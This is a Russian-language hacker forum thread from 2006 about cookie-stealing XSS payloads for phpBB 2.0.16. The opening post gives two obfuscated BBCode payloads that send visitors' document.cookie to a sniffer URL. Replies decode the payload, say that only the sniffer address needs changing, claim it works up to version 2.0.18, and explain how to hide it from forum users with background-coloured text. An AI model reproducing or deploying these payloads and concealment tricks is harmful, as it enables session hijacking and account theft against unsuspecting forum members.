Exploit в phpbb 2.0.16

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
Exploit в phpbb 2.0.16

Страница 1 из 2

Опции темы

Поиск в этой теме

Опции просмотра

Exploit в phpbb 2.0.16

01.12.2006, 02:33

{BuT@Min}

Познающий

Регистрация: 23.11.2006

Сообщений: 48

С нами: 10244676

Репутация: 10

Exploit в phpbb 2.0.16

Код:

[UR*L]http://www.[U*RL=http://wj.com/style=display:none;background&+#58;&+#117;&+#114;&+#108;&+#40;&+#106;&+#97;&+#118;&+#97;&+#115;&+#99;&+#114;&+#105;&+#112;&+#116;&+#58;&+#100;&+#111;&+#99;&+#117;&+#109;&+#101;&+#110;&+#116;&+#46;&+#105;&+#109;&+#97;&+#103;&+#101;&+#115;&+#91;&+#49;&+#93;&+#46;&+#115;&+#114;&+#99;&+#61;&+#34;&+#104;&+#116;&+#116;&+#112;&+#58;&+#47;&+#47;&+#97;&+#110;&+#116;&+#105;&+#99;&+#104;&+#97;&+#116;&+#46;&+#114;&+#117;&+#47;&+#99;&+#103;&+#105;&+#45;&+#98;&+#105;&+#110;&+#47;&+#115;&+#46;&+#106;&+#112;&+#103;&+#63;&+#34;+document.cookie;&+#41;&+#32;]wj[/*URL][/*URL]

и вот

Код:

[*color=#EFEFEF][*url]www.ut[*url=www.s=''style='font-size:0;color:#EFEFEF'style='top:expression(eval(th  is.sss));'sss=`i=new/**/Image();i.src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie;this.sss=null`style='font-size:0;][/url][/url]'[/color]

Стоит phpbb 2.0.16 а вопрос заключается в следующем... как Exploit подготовить к работе??
Ну насчёт первого мне интересна а где тама адрес снифера прописывать,а по поводу 2 я его испробывал но почему та куки не пришли(на себе испытавал )

𝕏 Twitter Reddit Telegram Копировать ссылку

01.12.2006, 02:36

kyzmi4

Участник форума

Регистрация: 19.07.2004

Сообщений: 135

С нами: 11478626

Репутация: 112

Это XSS. в первом адрес снифера:
#58;&+#117;&+#114;&+#108;&+#40;&+
#106;&+#97;&+#118;&+#97;&+#115;&+#99;&+
#114;&+#105;&+#112;&+#116;&+#58;&+#100;&+
#111;&+#99;&+#117;&+#109;&+#101;&+#110;&+
#116;&+#46;&+#105;&+#109;&+#97;&+#103;&+
#101;&+#115;&+#91;&+#49;&+#93;&+#46;&+
#115;&+#114;&+#99;&+#61;&+#34;&+#104;&+
#116;&+#116;&+#112;&+#58;&+#47;&+#47;&+
#97;&+#110;&+#116;&+#105;&+#99;&+#104;&+
#97;&+#116;&+#46;&+#114;&+#117;&+#47;&+
#99;&+#103;&+#105;&+#45;&+#98;&+#105;&+
#110;&+#47;&+#115;&+#46;&+#106;&+#112;&+
#103;&+#63;&+#34;+document.cookie

А ты звездочки убирал?

01.12.2006, 02:42

{BuT@Min}

Познающий

Регистрация: 23.11.2006

Сообщений: 48

С нами: 10244676

Репутация: 10

Во втором?- да убирал

Цитата:

Сообщение от kyzmi4

Что то я не совсем понял и где этот снифер находится ... Заранее извиняюсь за глупые вопросы(может быть)

Последний раз редактировалось {BuT@Min}; 01.12.2006 в 02:44..

01.12.2006, 07:55

злюка

Постоянный

Регистрация: 11.11.2005

Сообщений: 317

С нами: 10787308

Репутация: 409

закодировано тут вот, что :url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie можешь воспользоваться декодером тут _http://webmastertools.narod.ru/OnlineTools/unicode_decode.html

Последний раз редактировалось злюка; 01.12.2006 в 07:58..

01.12.2006, 11:09

MegaBits

Участник форума

Регистрация: 30.08.2006

Сообщений: 181

С нами: 10366322

Репутация: 45

А вместо этого http://wj.com/ должен быть написан адрес форума с которого хочу стащить куки? И еще эти XSS на phpBB 2.0.13 прокатят?

01.12.2006, 11:37

злюка

Постоянный

Регистрация: 11.11.2005

Сообщений: 317

С нами: 10787308

Репутация: 409

Цитата:

Сообщение от MegaBits

ничего в этой XSS менять кроме адреса снифера не нужно...просто постишь на форуме и ловишь куки, помоему эта XSS катит до версии 2.0.18 (включая).

01.12.2006, 21:13

{BuT@Min}

Познающий

Регистрация: 23.11.2006

Сообщений: 48

С нами: 10244676

Репутация: 10

Подписался на расылку снифера и нифига он что не шлёт --
Вы имеете возможность получать на ваш e-mail логи сниффера в режиме реального времени. Отсылка лога в почтовый ящик происходит сразу, как только сниффер примет информацию.

филтр на рефер указал в чём проблема??

(проверял заходил по хсс сам) как можна свой сниффер зделать????

Последний раз редактировалось {BuT@Min}; 01.12.2006 в 22:09..

02.12.2006, 00:17

MegaBits

Участник форума

Регистрация: 30.08.2006

Сообщений: 181

С нами: 10366322

Репутация: 45

Может страничку с Xss которую ты создал еще никто не просмотрел и поэтому куки не пришли?

06.12.2006, 19:00

Lorix

Новичок

Регистрация: 05.12.2006

Сообщений: 16

С нами: 10226605

Репутация: 1

Здраствуйте. У меня есть к вам 2 вопроса
1, Где можно скачать файлик и установить у тебя на хсоте чтобы он туда тянул кукисы
2, Если поставить данный код в сообщение в топике то он вить будет отображся так сказать открытым. Тоесть как текст.
И также будут видны надписи куки и урл.
Как быть подскажите. Или я чтото не то делаю ?

аська 491104

#10

06.12.2006, 20:32

Abra

Постоянный

Регистрация: 17.09.2005

Сообщений: 375

С нами: 10866583

Репутация: 175

1. Ищи на форуме по запросу "сниффер". Их тут много должно быть
2. Перед и после кода XSS поставь тэги цвета фона форума. (точнее фона поста.)
[c*olor=#RRGGBB]Здесь твоя ХССка[/c*olor]
где RRGGBB - цвет в формате Red Green Blue.
Твоя ХССка так и так будет открыта, но будет не видна в посте, и вряд ли ее заметят.

Страница 1 из 2

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
PhpBB 2.0.15 Database Authentication Details Exploit	VARVAR	Уязвимости CMS / форумов	11	01.02.2007 12:21
exploit phpBB 2.0.19 ( by SpiderZ )	liauliau	Уязвимости CMS / форумов	21	13.01.2007 23:01
phpBB 2.0.19 Exploit	m0nzt3r	Уязвимости CMS / форумов	41	29.06.2006 16:05
phpBB admin =>2.0.19 exec exploit	0verfe1	Уязвимости CMS / форумов	29	14.06.2006 00:35
phpBB <= 2.0.19 XSS Remote Cookie Disclosure Exploit	Rebz	Уязвимости	4	28.02.2006 19:45

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход